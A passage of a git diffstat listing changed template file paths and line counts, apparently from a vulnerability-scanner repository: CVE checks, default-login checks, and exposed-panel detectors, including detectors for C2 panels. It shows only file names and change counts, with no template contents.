| 4 +- http/cves/2024/CVE-2024-26331.yaml | 2 +- http/cves/2024/CVE-2024-27198.yaml | 5 +- http/cves/2024/CVE-2024-27497.yaml | 2 +- http/cves/2024/CVE-2024-27564.yaml | 4 +- http/cves/2024/CVE-2024-29059.yaml | 4 +- http/cves/2024/CVE-2024-3097.yaml | 11 +++-- http/cves/2024/CVE-2024-31621.yaml | 3 ++ http/cves/2024/CVE-2024-31848.yaml | 4 +- http/cves/2024/CVE-2024-31849.yaml | 4 +- http/cves/2024/CVE-2024-31850.yaml | 4 +- http/cves/2024/CVE-2024-31851.yaml | 9 ++-- http/cves/2024/CVE-2024-32640.yaml | 4 +- http/cves/2024/CVE-2024-32651.yaml | 4 +- http/cves/2024/CVE-2024-3273.yaml | 7 +-- http/cves/2024/CVE-2024-33575.yaml | 11 +++-- http/cves/2024/CVE-2024-33724.yaml | 4 +- http/cves/2024/CVE-2024-3400.yaml | 13 ++++-- http/cves/2024/CVE-2024-34470.yaml | 2 +- http/cves/2024/CVE-2024-3822.yaml | 46 +++++++++---------- http/cves/2024/CVE-2024-4040.yaml | 8 ++-- http/cves/2024/CVE-2024-4348.yaml | 2 +- http/cves/2024/CVE-2024-4358.yaml | 3 +- http/cves/2024/CVE-2024-4956.yaml | 6 ++- .../3com/3Com-wireless-default-login.yaml | 4 +- .../default-logins/ampjuke-default-login.yaml | 6 +-- .../asus/asus-rtn16-default-login.yaml | 4 +- .../asus/asus-wl500g-default-login.yaml | 4 +- .../asus/asus-wl520GU-default-login.yaml | 4 +- .../cambium-networks-default-login.yaml | 4 +- .../crushftp/crushftp-anonymous-login.yaml | 4 +- .../crushftp/crushftp-default-login.yaml | 2 +- .../digital-watchdog-default-login.yaml | 5 +- .../next-terminal-default-login.yaml | 2 +- .../pentaho/pentaho-default-login.yaml | 2 + .../soplanning/soplanning-default-login.yaml | 5 +- .../structurizr-default-login.yaml | 3 ++ .../timekeeper/timekeeper-default-login.yaml | 3 ++ http/default-logins/wazuh-default-login.yaml | 4 +- .../xxljob/xxljob-default-login.yaml | 3 ++ .../zabbix/zabbix-default-login.yaml | 2 +- .../3cx-phone-management-panel.yaml | 13 +++++- .../3cx-phone-webclient-management-panel.yaml | 17 +++++-- http/exposed-panels/acemanager-login.yaml | 6 ++- http/exposed-panels/acenet-panel.yaml | 2 +- http/exposed-panels/ackee-panel.yaml | 30 ++++++------ http/exposed-panels/acrolinx-dashboard.yaml | 4 +- http/exposed-panels/acti-panel.yaml | 4 +- .../exposed-panels/active-admin-exposure.yaml | 2 +- http/exposed-panels/activemq-panel.yaml | 5 +- http/exposed-panels/acunetix-login.yaml | 2 +- http/exposed-panels/addonfinance-portal.yaml | 2 +- http/exposed-panels/adhoc-transfer-panel.yaml | 19 ++++++-- http/exposed-panels/adiscon-loganalyzer.yaml | 2 +- http/exposed-panels/adminer-panel-detect.yaml | 10 +++- http/exposed-panels/adminer-panel.yaml | 16 +++++-- http/exposed-panels/adminset-panel.yaml | 2 +- .../adobe/adobe-component-login.yaml | 12 ++++- .../adobe/adobe-connect-central-login.yaml | 5 +- .../adobe/adobe-experience-manager-login.yaml | 10 +++- .../adobe/aem-crx-package-manager.yaml | 7 ++- .../exposed-panels/adobe/aem-sling-login.yaml | 7 ++- .../aircube-dashboard-panel.yaml | 2 +- http/exposed-panels/aircube-login.yaml | 2 +- http/exposed-panels/airflow-panel.yaml | 15 +++++- http/exposed-panels/airnotifier-panel.yaml | 2 +- http/exposed-panels/akamai-cloudtest.yaml | 2 +- http/exposed-panels/alfresco-detect.yaml | 2 +- http/exposed-panels/algonomia-panel.yaml | 4 +- .../allied-telesis-exposure.yaml | 12 +++-- http/exposed-panels/ambari-exposure.yaml | 2 +- http/exposed-panels/amcrest-login.yaml | 14 ++++-- http/exposed-panels/ametys-admin-login.yaml | 2 +- .../exposed-panels/amp-application-panel.yaml | 12 +++-- http/exposed-panels/ampache-panel.yaml | 12 +++-- .../amprion-gridloss-panel.yaml | 3 +- http/exposed-panels/anaqua-login-panel.yaml | 2 +- .../ansible-tower-exposure.yaml | 11 +++-- .../apache-jmeter-dashboard.yaml | 12 +++-- .../apache/apache-apisix-panel.yaml | 8 +++- .../apache/apache-mesos-panel.yaml | 16 +++++-- .../apache/public-tomcat-manager.yaml | 12 ++++- http/exposed-panels/apigee-panel.yaml | 2 +- http/exposed-panels/appsmith-web-login.yaml | 6 ++- http/exposed-panels/appspace-panel.yaml | 12 +++-- http/exposed-panels/appsuite-panel.yaml | 11 +++-- http/exposed-panels/appwrite-panel.yaml | 14 ++++-- .../exposed-panels/aqua-enterprise-panel.yaml | 4 +- .../arangodb-web-Interface.yaml | 12 +++-- http/exposed-panels/arcgis/arcgis-panel.yaml | 2 +- .../arcgis/arcgis-services.yaml | 12 +++-- .../archibus-webcentral-panel.yaml | 5 +- http/exposed-panels/arcserve-panel.yaml | 12 +++-- http/exposed-panels/arris-modem-detect.yaml | 11 +++-- http/exposed-panels/aspcms-backend-panel.yaml | 4 +- http/exposed-panels/aspect-control-panel.yaml | 2 +- http/exposed-panels/asus-aicloud-panel.yaml | 2 +- http/exposed-panels/asus-router-panel.yaml | 2 +- http/exposed-panels/atlantis-detect.yaml | 5 +- .../atlassian-bamboo-panel.yaml | 2 +- .../exposed-panels/atlassian-crowd-panel.yaml | 5 +- http/exposed-panels/audiobookshelf-panel.yaml | 2 +- http/exposed-panels/audiocodes-detect.yaml | 2 +- http/exposed-panels/authelia-panel.yaml | 2 +- http/exposed-panels/automatisch-panel.yaml | 2 +- http/exposed-panels/autoset-detect.yaml | 4 +- http/exposed-panels/avantfax-panel.yaml | 8 +++- .../avaya/avayaaura-cm-panel.yaml | 2 +- .../avaya/avayaaura-system-manager-panel.yaml | 2 +- http/exposed-panels/aviatrix-panel.yaml | 8 +++- http/exposed-panels/avigilon-panel.yaml | 12 +++-- http/exposed-panels/aws-ec2-autoscale.yaml | 2 +- http/exposed-panels/aws-opensearch-login.yaml | 2 +- http/exposed-panels/axel-webserver.yaml | 4 +- .../axway-api-manager-panel.yaml | 2 +- .../axway-securetransport-panel.yaml | 17 +++++-- .../axway-securetransport-webclient.yaml | 17 +++++-- http/exposed-panels/axxon-client-panel.yaml | 12 +++-- http/exposed-panels/bedita-panel.yaml | 8 +++- .../exposed-panels/beego-admin-dashboard.yaml | 11 +++-- .../beyondtrust-priv-panel.yaml | 4 +- http/exposed-panels/bigbluebutton-login.yaml | 2 +- http/exposed-panels/bigfix-login.yaml | 2 +- http/exposed-panels/bigip-rest-panel.yaml | 8 +++- http/exposed-panels/biotime-panel.yaml | 2 +- .../bitdefender-gravityzone.yaml | 12 +++-- http/exposed-panels/bitrix-panel.yaml | 4 +- .../exposed-panels/bitwarden-vault-panel.yaml | 12 +++-- http/exposed-panels/black-duck-panel.yaml | 2 +- .../bloofoxcms-login-panel.yaml | 10 ++-- .../bmc/bmc-discovery-panel.yaml | 2 +- .../bmc/bmc-remedy-sso-panel.yaml | 28 +++++------ http/exposed-panels/bolt-cms-panel.yaml | 3 +- http/exposed-panels/bookstack-panel.yaml | 8 +++- http/exposed-panels/buildbot-panel.yaml | 12 +++-- .../busybox-repository-browser.yaml | 4 +- http/exposed-panels/bynder-panel.yaml | 2 +- http/exposed-panels/c2/ares-rat-c2.yaml | 2 +- http/exposed-panels/c2/brute-ratel-c4.yaml | 2 +- http/exposed-panels/c2/caldera-c2.yaml | 4 +- http/exposed-panels/c2/covenant-c2.yaml | 2 +- http/exposed-panels/c2/deimos-c2.yaml | 2 +- http/exposed-panels/c2/empire-c2.yaml | 4 +- http/exposed-panels/c2/evilginx.yaml | 4 +- http/exposed-panels/c2/hack5-cloud-c2.yaml | 4 +- http/exposed-panels/c2/hookbot-rat.yaml | 2 +- http/exposed-panels/c2/meduza-stealer.yaml | 2 +- http/exposed-panels/c2/mystic-stealer.yaml | 2 +- http/exposed-panels/c2/mythic-c2.yaml | 2 +- http/exposed-panels/c2/nh-c2.yaml | 4 +- http/exposed-panels/c2/pupyc2.yaml | 2 +- .../c2/rhadamanthys-stealer-panel.yaml | 2 +- http/exposed-panels/c2/supershell-c2.yaml | 4 +- http/exposed-panels/c2/viper-c2.yaml | 4 +- http/exposed-panels/cacti-panel.yaml | 16 +++++-- http/exposed-panels/cas-login.yaml | 10 ++-- http/exposed-panels/casaos-panel.yaml | 2 +- http/exposed-panels/casdoor-login.yaml | 8 +++- http/exposed-panels/casemanager-panel.yaml | 2 +- .../caton-network-manager-system.yaml | 2 +- http/exposed-panels/ccm-detect.yaml | 2 +- http/exposed-panels/centreon-panel.yaml | 8 +++- .../exposed-panels/changedetection-panel.yaml | 2 +- .../exposed-panels/checkmk/checkmk-login.yaml | 2 +- .../checkpoint/ssl-network-extender.yaml | 15 ++++-- http/exposed-panels/chronos-panel.yaml | 4 +- .../exposed-panels/cisco-firepower-panel.yaml | 2 +- http/exposed-panels/cisco-unity-panel.yaml | 2 +- .../cisco/cisco-anyconnect-vpn.yaml | 2 +- .../exposed-panels/cisco/cisco-asa-panel.yaml | 2 +- http/exposed-panels/cisco/cisco-edge-340.yaml | 8 +++- .../cisco/cisco-expressway-panel.yaml | 2 +- .../cisco/cisco-finesse-login.yaml | 2 +- .../cisco/cisco-integrated-login.yaml | 2 +- .../cisco/cisco-ios-xe-panel.yaml | 4 +- .../cisco/cisco-onprem-panel.yaml | 15 ++++-- .../cisco/cisco-prime-infrastructure.yaml | 4 +- http/exposed-panels/cisco/cisco-sd-wan.yaml | 3 +- .../cisco/cisco-secure-desktop.yaml | 2 +- .../cisco/cisco-systems-login.yaml | 2 +- .../cisco/cisco-telepresence.yaml | 2 +- .../cisco/cisco-ucs-kvm-login.yaml | 8 +++- .../cisco/cisco-vmanage-login.yaml | 2 +- .../cisco/cisco-webvpn-detect.yaml | 4 +- .../citrix-adc-gateway-detect.yaml | 5 +- http/exposed-panels/citrix-vpn-detect.yaml | 5 +- .../claris-filemaker-webdirect.yaml | 2 +- http/exposed-panels/cleanweb-panel.yaml | 2 +- .../clearpass-policy-manager.yaml | 8 +++- http/exposed-panels/cloudpanel-login.yaml | 16 +++++-- http/exposed-panels/cobbler-webgui.yaml | 8 +++- http/exposed-panels/code-server-login.yaml | 6 ++- http/exposed-panels/code42-panel.yaml | 2 +- .../codemeter-webadmin-panel.yaml | 2 +- .../coldfusion-administrator-login.yaml | 12 ++++- http/exposed-panels/compal-panel.yaml | 2 +- .../exposed-panels/compalex-panel-detect.yaml | 4 +- .../completeview-web-panel.yaml | 2 +- .../concrete5/concrete5-install.yaml | 18 ++++++-- .../concrete5/concrete5-panel.yaml | 13 +++++- http/exposed-panels/connect-box-login.yaml | 10 ++-- .../connectwise-backup-manager.yaml | 2 +- http/exposed-panels/connectwise-panel.yaml | 9 +++- http/exposed-panels/contao-login-panel.yaml | 16 +++++-- .../exposed-panels/content-central-login.yaml | 2 +- http/exposed-panels/corebos-panel.yaml | 5 +- http/exposed-panels/cortex-xsoar-login.yaml | 8 +++- http/exposed-panels/couchdb-exposure.yaml | 5 +- http/exposed-panels/couchdb-fauxton.yaml | 5 +- http/exposed-panels/cpanel-api-codes.yaml | 18 ++++++-- http/exposed-panels/craftcms-admin-panel.yaml | 7 ++- http/exposed-panels/craftercms-panel.yaml | 28 +++++------ http/exposed-panels/creatio-login-panel.yaml | 2 +- http/exposed-panels/crontab-ui.yaml | 2 +- http/exposed-panels/crush-ftp-login.yaml | 8 ++-- http/exposed-panels/cryptobox-panel.yaml | 2 +- http/exposed-panels/cudatel-panel.yaml | 2 +- http/exposed-panels/cvent-panel-detect.yaml | 2 +- http/exposed-panels/cwp-webpanel.yaml | 2 +- http/exposed-panels/cyberchef-panel.yaml | 28 +++++------ .../cyberoam-ssl-vpn-panel.yaml | 11 +++-- http/exposed-panels/dahua-web-panel.yaml | 2 +- .../darktrace-threat-visualizer.yaml | 11 +++-- http/exposed-panels/dashy-panel.yaml | 5 +- http/exposed-panels/datadog-login.yaml | 2 +- http/exposed-panels/dataease-panel.yaml | 11 +++-- http/exposed-panels/dataiku-panel.yaml | 2 +- http/exposed-panels/davantis-panel.yaml | 2 +- http/exposed-panels/daybyday-panel.yaml | 8 +++- .../exposed-panels/dell-bmc-panel-detect.yaml | 2 +- http/exposed-panels/dell-idrac.yaml | 2 +- http/exposed-panels/dell-wyse-login.yaml | 2 +- http/exposed-panels/deluge-webui-panel.yaml | 12 +++-- .../digital-watchdog-panel.yaml | 6 +-- http/exposed-panels/digitalrebar-login.yaml | 2 +- .../directadmin-login-panel.yaml | 8 +++- http/exposed-panels/directum-login.yaml | 2 +- http/exposed-panels/discuz-panel.yaml | 4 +- http/exposed-panels/django-admin-panel.yaml | 3 +- .../docebo-elearning-panel.yaml | 4 +- http/exposed-panels/dockge-panel.yaml | 3 +- http/exposed-panels/dokuwiki-panel.yaml | 2 +- http/exposed-panels/doris-panel.yaml | 2 +- http/exposed-panels/dotclear-panel.yaml | 8 +++- http/exposed-panels/dotcms-admin-panel.yaml | 5 +- http/exposed-panels/dplus-dashboard.yaml | 2 +- http/exposed-panels/dqs-superadmin-panel.yaml | 2 +- http/exposed-panels/dradis-pro-panel.yaml | 2 +- .../drawio-flowchartmaker-panel.yaml | 12 +++-- .../druid-console-exposure.yaml | 2 +- http/exposed-panels/druid-panel.yaml | 2 +- http/exposed-panels/drupal-login.yaml | 6 ++- http/exposed-panels/dxplanning-panel.yaml | 2 +- http/exposed-panels/dynatrace-panel.yaml | 2 +- .../dzzoffice/dzzoffice-install.yaml | 8 ++-- .../dzzoffice/dzzoffice-panel.yaml | 7 ++- http/exposed-panels/e-mobile-panel.yaml | 2 +- http/exposed-panels/eMerge-panel.yaml | 12 +++-- http/exposed-panels/earcu-panel.yaml | 2 +- http/exposed-panels/easyjob-panel.yaml | 2 +- http/exposed-panels/easyvista-panel.yaml | 28 +++++------ http/exposed-panels/eclipse-birt-panel.yaml | 4 +- http/exposed-panels/edgeos-login.yaml | 2 +- http/exposed-panels/efak-login-panel.yaml | 2 +- .../eko-management-console-login.yaml | 4 +- .../eko-software-update-panel.yaml | 2 +- .../elemiz-network-manager.yaml | 2 +- http/exposed-panels/emby-panel.yaml | 6 ++- http/exposed-panels/emessage-panel.yaml | 2 +- http/exposed-panels/emqx-panel.yaml | 2 +- http/exposed-panels/ems-webclient-panel.yaml | 2 +- http/exposed-panels/eos-http-browser.yaml | 2 +- http/exposed-panels/episerver-panel.yaml | 2 +- .../epson-projector-detect.yaml | 2 +- http/exposed-panels/eset-protect-panel.yaml | 2 +- http/exposed-panels/esphome-panel.yaml | 12 +++-- http/exposed-panels/esxi-system.yaml | 8 +++- http/exposed-panels/eventum-panel.yaml | 5 +- http/exposed-panels/evlink/evlink-panel.yaml | 4 +- .../exposed-panels/evlink/evse-web-panel.yaml | 15 ++++-- http/exposed-panels/ewm-manager-panel.yaml | 2 +- .../exposed-panels/exagrid-manager-panel.yaml | 12 +++-- http/exposed-panels/exolis-engage-panel.yaml | 4 +- http/exposed-panels/exposed-webalizer.yaml | 4 +- http/exposed-panels/extron-cms-panel.yaml | 16 +++++-- http/exposed-panels/ez-publish-panel.yaml | 2 +- .../f-secure-policy-manager.yaml | 8 +++- http/exposed-panels/f5-admin-interface.yaml | 2 +- .../fastpanel-hosting-control-panel.yaml | 2 +- .../filebrowser-login-panel.yaml | 5 +- http/exposed-panels/fiori-launchpad.yaml | 10 ++-- http/exposed-panels/fiorilaunchpad-logon.yaml | 3 +- .../fireware-xtm-user-authentication.yaml | 8 +++- .../flahscookie-superadmin-panel.yaml | 2 +- http/exposed-panels/flink-exposure.yaml | 2 +- http/exposed-panels/flip-cms-panel.yaml | 2 +- .../flureedb-admin-console.yaml | 2 +- http/exposed-panels/footprints-panel.yaml | 2 +- http/exposed-panels/forcepoint.yaml | 2 +- http/exposed-panels/forti/fortiadc-panel.yaml | 12 +++-- .../fortinet/f5-next-central-manager.yaml | 2 +- .../fortinet/fortiap-panel.yaml | 12 +++-- .../fortinet/fortiauthenticator-detect.yaml | 5 +- .../fortinet/forticlientems-panel.yaml | 2 +- .../fortinet/fortimail-panel.yaml | 12 +++-- .../fortinet/fortinet-fortiddos-panel.yaml | 12 +++-- .../fortinet/fortinet-fortimanager-panel.yaml | 2 +- .../fortinet/fortinet-fortinac-panel.yaml | 12 +++-- .../fortinet/fortinet-panel.yaml | 2 +- .../fortinet/fortios-management-panel.yaml | 15 ++++-- .../fortinet/fortios-panel.yaml | 15 ++++-- .../fortinet/fortisiem-panel.yaml | 4 +- .../fortinet/fortitester-login-panel.yaml | 12 +++-- .../fortinet/fortiweb-panel.yaml | 8 +++- .../fortinet/fortiwlm-panel.yaml | 11 ++++- http/exposed-panels/freeipa-panel.yaml | 11 +++-- .../freepbx-administration-panel.yaml | 12 +++-- http/exposed-panels/friendica-panel.yaml | 12 +++-- .../froxlor-management-panel.yaml | 12 +++-- http/exposed-panels/ftm-manager-panel.yaml | 18 ++++++-- http/exposed-panels/fuelcms-panel.yaml | 5 +- .../fuji-xerox-printer-detect.yaml | 2 +- .../fusionauth-admin-panel.yaml | 12 +++-- http/exposed-panels/gargoyle-router.yaml | 2 +- .../exposed-panels/geoserver-login-panel.yaml | 14 ++++-- http/exposed-panels/gerapy-detect.yaml | 2 +- .../gira-homeserver-homepage.yaml | 2 +- .../git-repository-browser.yaml | 12 +++-- http/exposed-panels/gitblit-panel.yaml | 15 ++++-- http/exposed-panels/gitea-login.yaml | 12 ++++- .../github-enterprise-detect.yaml | 10 ++-- http/exposed-panels/gitlab-detect.yaml | 9 +++- http/exposed-panels/globalprotect-panel.yaml | 2 +- http/exposed-panels/glowroot-panel.yaml | 2 +- http/exposed-panels/glpi-panel.yaml | 15 ++++-- http/exposed-panels/gnu-mailman.yaml | 13 ++++-- http/exposed-panels/goanywhere-mft-login.yaml | 2 +- http/exposed-panels/gocd-login.yaml | 11 ++++- http/exposed-panels/gocron-panel.yaml | 2 +- http/exposed-panels/gogs-panel.yaml | 16 +++++-- http/exposed-panels/goodjob-dashboard.yaml | 2 +- http/exposed-panels/gotify-panel.yaml | 12 +++-- .../gradle/gradle-enterprise-panel.yaml | 2 +- http/exposed-panels/grafana-detect.yaml | 13 ++++-- .../grails-database-admin-console.yaml | 2 +- http/exposed-panels/graylog-panel.yaml | 2 +- http/exposed-panels/greenbone-panel.yaml | 16 +++++-- http/exposed-panels/group-ib-panel.yaml | 2 +- http/exposed-panels/gyra-master-admin.yaml | 2 +- http/exposed-panels/h2console-panel.yaml | 9 +++- http/exposed-panels/hadoop-exposure.yaml | 2 +- .../haivision-gateway-panel.yaml | 2 +- .../haivision-media-platform-panel.yaml | 2 +- http/exposed-panels/hangfire-dashboard.yaml | 12 +++-- http/exposed-panels/harbor-panel.yaml | 5 +- .../hashicorp-consul-agent.yaml | 7 ++- .../hashicorp-consul-webgui.yaml | 9 +++- http/exposed-panels/hestia-panel.yaml | 15 ++++-- http/exposed-panels/highmail-admin-panel.yaml | 15 ++++-- .../hivemanager-login-panel.yaml | 2 +- http/exposed-panels/hmc-hybris-panel.yaml | 5 +- http/exposed-panels/home-assistant-panel.yaml | 2 +- http/exposed-panels/homebridge-panel.yaml | 2 +- http/exposed-panels/homematic-panel.yaml | 7 ++- http/exposed-panels/homer-panel.yaml | 2 +- .../honeywell-xl-web-controller.yaml | 2 +- http/exposed-panels/horde-login-panel.yaml | 2 +- http/exposed-panels/horde-webmail-login.yaml | 2 +- .../hospital-management-panel.yaml | 11 +++-- http/exposed-panels/hp-ilo-5.yaml | 2 +- http/exposed-panels/hp-service-manager.yaml | 8 +++- .../hybris-administration-console.yaml | 12 +++-- http/exposed-panels/hydra-dashboard.yaml | 12 +++-- http/exposed-panels/hypertest-dashboard.yaml | 2 +- http/exposed-panels/i-mscp-panel.yaml | 2 +- http/exposed-panels/ibm-openadmin-panel.yaml | 2 +- http/exposed-panels/ibm/ibm-dcec-panel.yaml | 2 +- .../ibm/ibm-decision-server-console.yaml | 2 +- http/exposed-panels/ibm/ibm-maximo-login.yaml | 5 +- .../ibm/ibm-mqseries-web-console.yaml | 2 +- http/exposed-panels/ibm/ibm-note-login.yaml | 2 +- http/exposed-panels/ibm/ibm-odm-panel.yaml | 4 +- .../ibm/ibm-security-access-manager.yaml | 2 +- .../ibm/ibm-websphere-admin-panel.yaml | 5 +- .../ibm/ibm-websphere-panel.yaml | 8 +++- http/exposed-panels/icc-pro-login.yaml | 2 +- http/exposed-panels/icewarp-panel-detect.yaml | 12 +++-- http/exposed-panels/icinga-web-login.yaml | 13 +++++- http/exposed-panels/iclock-admin-panel.yaml | 2 +- .../ictprotege-login-panel.yaml | 12 +++-- .../identity-services-engine.yaml | 8 +++- http/exposed-panels/ilch-admin-panel.yaml | 12 +++-- http/exposed-panels/ilias-panel.yaml | 11 +++-- http/exposed-panels/immich-panel.yaml | 2 +- .../incapptic-connect-panel.yaml | 6 ++- http/exposed-panels/influxdb-panel.yaml | 9 +++- http/exposed-panels/intelbras-login.yaml | 2 +- http/exposed-panels/intelbras-panel.yaml | 16 +++++-- .../exposed-panels/intellian-aptus-panel.yaml | 8 +++- .../interactsoftware-interact.yaml | 2 +- .../ipdiva-mediation-panel.yaml | 2 +- http/exposed-panels/isams-panel.yaml | 2 +- http/exposed-panels/issabel-login.yaml | 2 +- http/exposed-panels/itop-panel.yaml | 2 +- .../ivanti-connect-secure-panel.yaml | 15 ++++-- http/exposed-panels/ixcache-panel.yaml | 2 +- http/exposed-panels/jamf-login.yaml | 2 +- http/exposed-panels/jamf-setup-assistant.yaml | 2 +- http/exposed-panels/jaspersoft-panel.yaml | 8 +++- .../jboss/jboss-jbpm-admin.yaml | 11 +++-- http/exposed-panels/jboss/jboss-juddi.yaml | 13 ++++-- .../jboss/jboss-soa-platform.yaml | 12 +++-- http/exposed-panels/jboss/jmx-console.yaml | 2 +- http/exposed-panels/jboss/wildfly-panel.yaml | 2 +- http/exposed-panels/jcms-panel.yaml | 11 +++-- http/exposed-panels/jedox-web-panel.yaml | 19 ++++++-- http/exposed-panels/jeedom-panel.yaml | 8 +++- .../jellyseerr-login-panel.yaml | 2 +- http/exposed-panels/jenkins-api-panel.yaml | 7 ++- http/exposed-panels/jenkins-login.yaml | 9 +++- http/exposed-panels/jfrog-login.yaml | 4 +- http/exposed-panels/joomla-panel.yaml | 7 ++- http/exposed-panels/jorani-panel.yaml | 2 +- http/exposed-panels/jsherp-boot-panel.yaml | 2 +- http/exposed-panels/jumpserver-panel.yaml | 2 +- http/exposed-panels/juniper-panel.yaml | 2 +- http/exposed-panels/kafka-center-login.yaml | 13 +++++- .../kafka-consumer-monitor.yaml | 13 +++++- http/exposed-panels/kafka-monitoring.yaml | 11 ++++- http/exposed-panels/kafka-topics-ui.yaml | 4 +- http/exposed-panels/kanboard-login.yaml | 5 +- http/exposed-panels/kasm-login-panel.yaml | 2 +- http/exposed-panels/kavita-panel-detect.yaml | 6 ++- http/exposed-panels/kenesto-login.yaml | 2 +- http/exposed-panels/kettle-panel.yaml | 2 +- http/exposed-panels/keycloak-admin-panel.yaml | 16 +++++-- http/exposed-panels/kibana-panel.yaml | 8 +++- http/exposed-panels/kiteworks-pcn-panel.yaml | 5 +- http/exposed-panels/kiwitcms-login.yaml | 8 +++- http/exposed-panels/kkfileview-panel.yaml | 2 +- http/exposed-panels/klr300n-panel.yaml | 4 +- http/exposed-panels/kodak-network-panel.yaml | 4 +- http/exposed-panels/koel-panel.yaml | 2 +- http/exposed-panels/konga-panel.yaml | 2 +- http/exposed-panels/kopano-webapp-panel.yaml | 2 +- .../kraken-cluster-monitoring.yaml | 2 +- http/exposed-panels/kubernetes-dashboard.yaml | 3 +- .../kubernetes-enterprise-manager.yaml | 9 +++- http/exposed-panels/kubernetes-mirantis.yaml | 4 +- http/exposed-panels/kubernetes-web-view.yaml | 14 ++++-- http/exposed-panels/kubeview-dashboard.yaml | 14 ++++-- http/exposed-panels/labkey-server-login.yaml | 13 ++++-- http/exposed-panels/labtech-panel.yaml | 2 +- http/exposed-panels/lancom-router-panel.yaml | 2 +- http/exposed-panels/lansweeper-login.yaml | 12 +++-- .../ldap-account-manager-panel.yaml | 2 +- http/exposed-panels/lenovo-fp-panel.yaml | 11 +++-- http/exposed-panels/librenms-login.yaml | 4 +- http/exposed-panels/librephotos-panel.yaml | 2 +- http/exposed-panels/librespeed-panel.yaml | 2 +- http/exposed-panels/liferay-portal.yaml | 11 +++-- http/exposed-panels/linkerd-panel.yaml | 11 +++-- http/exposed-panels/linshare-panel.yaml | 2 +- .../livehelperchat-admin-panel.yaml | 15 ++++-- .../exposed-panels/livezilla-login-panel.yaml | 4 +- .../locklizard-webviewer-panel.yaml | 2 +- http/exposed-panels/lockself-panel.yaml | 2 +- .../logitech-harmony-portal.yaml | 2 +- http/exposed-panels/lomnido-panel.yaml | 2 +- http/exposed-panels/looker-panel.yaml | 2 +- http/exposed-panels/loxone-panel.yaml | 2 +- http/exposed-panels/mach-proweb-login.yaml | 4 +- http/exposed-panels/machform-admin-panel.yaml | 2 +- http/exposed-panels/maestro-login-panel.yaml | 2 +- http/exposed-panels/mag-dashboard-panel.yaml | 2 +- http/exposed-panels/magento-admin-panel.yaml | 11 +++-- .../magento-downloader-panel.yaml | 11 +++-- http/exposed-panels/magnolia-panel.yaml | 2 +- http/exposed-panels/mailhog-panel.yaml | 2 +- http/exposed-panels/mailwatch-login.yaml | 2 +- http/exposed-panels/maltrail-panel.yaml | 2 +- http/exposed-panels/mantisbt-panel.yaml | 11 +++-- http/exposed-panels/matomo-panel.yaml | 9 ++-- http/exposed-panels/memos-panel.yaml | 12 +++-- http/exposed-panels/meshcentral-login.yaml | 8 +++- http/exposed-panels/metabase-panel.yaml | 10 +++- http/exposed-panels/metasploit-panel.yaml | 20 ++++++-- .../exposed-panels/metasploit-setup-page.yaml | 18 ++++++-- http/exposed-panels/metersphere-login.yaml | 6 ++- http/exposed-panels/mfiles-web-detect.yaml | 11 +++-- .../microfocus-admin-server.yaml | 10 ++-- .../exposed-panels/microfocus-filr-panel.yaml | 9 ++-- .../microfocus-lifecycle-panel.yaml | 2 +- .../exposed-panels/microfocus-vibe-panel.yaml | 11 +++-- .../microsoft-exchange-panel.yaml | 10 +++- .../mikrotik/mikrotik-routeros-old.yaml | 12 +++-- .../mikrotik/mikrotik-routeros.yaml | 5 +- http/exposed-panels/mini-start-page.yaml | 2 +- http/exposed-panels/minio-browser.yaml | 15 +++++- http/exposed-panels/minio-console.yaml | 2 +- http/exposed-panels/misp-panel.yaml | 12 +++-- http/exposed-panels/mitel-micollab-panel.yaml | 2 +- http/exposed-panels/mitel-panel-detect.yaml | 11 +++-- http/exposed-panels/mitric-checker-panel.yaml | 2 +- .../mobile-management-panel.yaml | 4 +- http/exposed-panels/mobileiron-sentry.yaml | 2 +- http/exposed-panels/modoboa-panel.yaml | 13 ++++-- http/exposed-panels/monitorr-panel.yaml | 2 +- http/exposed-panels/monstra-admin-panel.yaml | 5 +- .../moodle-workplace-panel.yaml | 2 +- http/exposed-panels/movable-type-login.yaml | 9 +++- http/exposed-panels/mpftvc-admin-panel.yaml | 2 +- http/exposed-panels/mpsec-isg1000-panel.yaml | 4 +- .../ms-exchange-web-service.yaml | 17 +++++-- http/exposed-panels/mspcontrol-login.yaml | 2 +- http/exposed-panels/mybb-forum-detect.yaml | 12 +++-- .../mybb/mybb-forum-install.yaml | 12 +++-- http/exposed-panels/mylittleadmin-panel.yaml | 2 +- http/exposed-panels/mylittlebackup-panel.yaml | 2 +- http/exposed-panels/mystrom-panel.yaml | 2 +- http/exposed-panels/n8n-panel.yaml | 28 +++++------ http/exposed-panels/nagios-panel.yaml | 6 ++- http/exposed-panels/nagios-xi-panel.yaml | 14 ++++-- http/exposed-panels/nagvis-panel.yaml | 11 +++-- http/exposed-panels/navicat-server-panel.yaml | 4 +- http/exposed-panels/ncentral-panel.yaml | 2 +- http/exposed-panels/nconf-panel.yaml | 2 +- http/exposed-panels/neo4j-browser.yaml | 8 +++- http/exposed-panels/neobox-panel.yaml | 4 +- .../neocase-hrportal-panel.yaml | 2 +- http/exposed-panels/nessus-panel.yaml | 12 +++-- .../netdata-dashboard-detected.yaml | 9 +++- http/exposed-panels/netdata-panel.yaml | 8 +++- http/exposed-panels/netflix-conductor-ui.yaml | 8 +++- http/exposed-panels/netscaler-aaa-login.yaml | 2 +- http/exposed-panels/netscaler-gateway.yaml | 4 +- http/exposed-panels/netsparker-panel.yaml | 2 +- http/exposed-panels/nexus-panel.yaml | 2 +- http/exposed-panels/nginx-admin-panel.yaml | 2 +- http/exposed-panels/nginx-ui-dashboard.yaml | 12 +++-- http/exposed-panels/nocodb-panel.yaml | 30 ++++++------ http/exposed-panels/noescape-login.yaml | 2 +- .../nordex-wind-farm-portal.yaml | 2 +- .../normhost-backup-server-manager.yaml | 2 +- http/exposed-panels/novnc-login-panel.yaml | 2 +- http/exposed-panels/nozomi-panel.yaml | 2 +- http/exposed-panels/np-data-cache.yaml | 2 +- http/exposed-panels/nport-web-console.yaml | 2 +- http/exposed-panels/nsq-admin-panel.yaml | 2 +- http/exposed-panels/nuxeo-platform-panel.yaml | 2 +- http/exposed-panels/nzbget-panel.yaml | 11 +++-- http/exposed-panels/o2-easy-panel.yaml | 2 +- http/exposed-panels/ocomon-panel.yaml | 11 +++-- http/exposed-panels/ocs-inventory-login.yaml | 4 +- http/exposed-panels/octoprint-login.yaml | 2 +- .../exposed-panels/odoo-database-manager.yaml | 13 ++++-- http/exposed-panels/odoo-panel.yaml | 13 ++++-- http/exposed-panels/office-webapps-panel.yaml | 11 +++-- .../officekeeper-admin-login.yaml | 2 +- http/exposed-panels/oipm-detect.yaml | 4 +- http/exposed-panels/olt-web-interface.yaml | 2 